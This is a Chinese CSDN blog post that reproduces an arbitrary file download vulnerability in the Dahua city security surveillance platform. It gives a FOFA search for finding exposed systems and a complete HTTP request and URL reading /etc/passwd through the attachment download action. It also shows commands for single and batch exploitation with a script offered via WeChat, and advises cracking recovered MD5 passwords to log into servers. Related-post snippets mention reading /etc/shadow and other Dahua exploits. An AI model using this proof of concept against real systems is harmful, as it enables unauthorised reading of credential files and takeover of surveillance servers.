大华城市安防系统平台任意文件下载漏洞

最新推荐文章于 2024-03-27 16:01:45 发布
最新推荐文章于 2024-03-27 16:01:45 发布
阅读量637 收藏 1
点赞数
文章标签: web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/133623505
版权

一、漏洞描述

大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。

大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

二、网络空间搜索引擎查询

fofa查询

app="dahua-DSS"

三、漏洞复现

poc

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

浏览器直接访问 http://ip:port/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd,可下载文件

四、批量检测与利用

单个检测与利用

 python .\DDS-Download.py -u http://ip:port

对密码进行解密(MD5免费在线解密破解_MD5在线加密-SOMD5 或者 md5在线解密破解,md5解密加密

点到为止,远程登录服务器,这里就不在演示了。

批量检测

python .\DDS-Download.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231007 获取检测利用脚本

为赋新词强说愁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大华智慧园区综合管理平台存在任意文件上传漏洞
nnn2188185的博客
07-18 850
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。
RayScan漏扫工具
JZJCyangfan的博客
12-16 1045
通过登录扫描可对数据库的系统表甚至字段进行安全检测。对系统存在的弱口令做检测,支持知名的协议、数据库、中间件、HTTP服务、HTTPS服务和摄像头检测如TELNET、FTP、SSH、POP3、RDP、SMTP、Oracle、MySQL、PostgreSQL、MsSQL、Sybase、Informix、HTTP、大华摄像头、华为摄像头等。支持扫描物联网设备,如主流厂商海康威视、宇视、华为、大华、Brickcom、索尼、TP-LINK、AXIS、佳能等的摄像头,三星、惠普、爱普生、佳能等厂商的打印机。
漏洞复现--大华城市安防系统平台任意文件下载(poc)
qq_53003652的博客
10-07 299
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。用户密码存放在etc/shadow下,读取etc/shadow。点到为止,拿到密码后可以干什么懂得都懂,这里也是不演示了。成功读取etc/passwd。自行查询厂商发布补丁。
大华监控DSS存在SQL注入高危漏洞
最新发布
wan___she__pi的博客
03-27 514
大华DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合,实现更加智能、便捷的分级查询服务。大华 DSS 数字监控系统 存在File.action SQL注入,黑客可以利用该漏洞执行任意SQL语句,获取敏感信息,造成危害。
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
holyxp的博客
12-18 2047
大华 DSs 数字监控系统大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。
复现大华 DSS 数字监控系统 任意文件读取漏洞_38
fushuang333的博客
02-03 1224
复现大华 DSS 数字监控系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
大华校园安防系统建设方案
08-20
大华校园安防系统建设方案知识点总结 大华校园安防系统建设方案是指利用信息技术和网络通讯技术,整合校园内的安全监控、人员管理、车辆管理、突发事件快速应急等多个系统,实现在校园内的安全防护和管理。以下是...
大华平台DSS视频监控系统介绍.doc
05-13
大华平台DSS视频监控系统介绍
26页浙江大华《智慧城市安防解决方案》.pdf
09-26
26页浙江大华《智慧城市安防解决方案》.pdf
大华综合安防平台一体机白皮书.docx
10-11
"大华综合安防平台一体机白皮书" 大华股份是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商,提供端到端的视频监控解决方案、系统及服务,为城市运营、企业管理、个人消费者生活创造价值。该公司拥有...
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
02-10
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
通过RTSP协议捕获大华摄像机视频
11-18
Opencv3通过RTSP协议捕获大华摄像头视频,在VisualStudio 2017 下编译通过
大华智慧园区综合管理平台任意密码读取漏洞复现
08-14 2081
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台密码泄露漏洞
xiaokp7的博客
09-07 1024
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权,所以可以直接得到system的密码(采用MD5加密)。
漏洞复现--大华ICC readpic任意文件读取漏洞
qq_53003652的博客
11-03 1142
对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。ICC,即大华浩睿智能物联综合管理平台。该产品readpic存在任意文件读取漏洞大华ICC智能物联综合管理平台
复现大华DSS信息泄露漏洞_15
fushuang333的博客
01-11 1276
复现大华DSS信息泄露漏洞,DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。
漏洞复现--大华城市安防系统平台任意文件下载
zkaqlaoniao的博客
10-12 172
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。用户密码存放在etc/shadow下,读取etc/shadow。点到为止,拿到密码后可以干什么懂得都懂,这里也是不演示了。运气好的话root密码可以破解。成功读取etc/passwd。自行查询厂商发布补丁。
【1day】复现大华智慧园区综合管理平台存在任意密码读取漏洞
记录并分享学习安全的知识点..
08-16 466
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在任意密码读取漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华安防监控web二次开发包
10-16
大华安防监控web二次开发包是一种由大华科技开发的软件开发工具包,旨在帮助开发者在大华安防监控产品的基础上进行二次开发。该开发包提供了丰富的API和丰富的功能模块,使开发者能够通过自定义开发来满足不同应用场景的需求。 大华安防监控web二次开发包具有以下特点和优势: 1.全面的功能支持:开发包提供了安防监控产品的各项基本功能,包括视频监控、报警管理、远程控制等,可以有效地满足各种应用场景的需求。 2.丰富的开发接口:开发包提供了丰富的开发接口和SDK,包括视频数据接口、设备管理接口、事件处理接口等,方便开发者进行二次开发并与其他系统进行集成。 3.灵活的定制性:开发包提供了丰富的可配置项和定制化选项,可以根据实际需求进行功能扩展和界面定制,提供个性化的用户体验。 4.稳定可靠的性能:开发包基于大华科技的安防监控产品开发而成,具有稳定可靠的性能和良好的兼容性,可以满足各种复杂应用场景和大规模部署的需求。 5.持续的技术支持:大华科技作为业内知名的安防监控产品供应商,提供了专业的技术支持和服务团队,能够及时解决开发过程中的问题,保障开发工作的顺利进行。 总之,大华安防监控web二次开发包是一款功能强大、易于定制的软件开发工具包,为开发者提供了丰富的接口和功能模块,可以实现个性化的安防监控系统开发,并提供了持续的技术支持和优质的服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值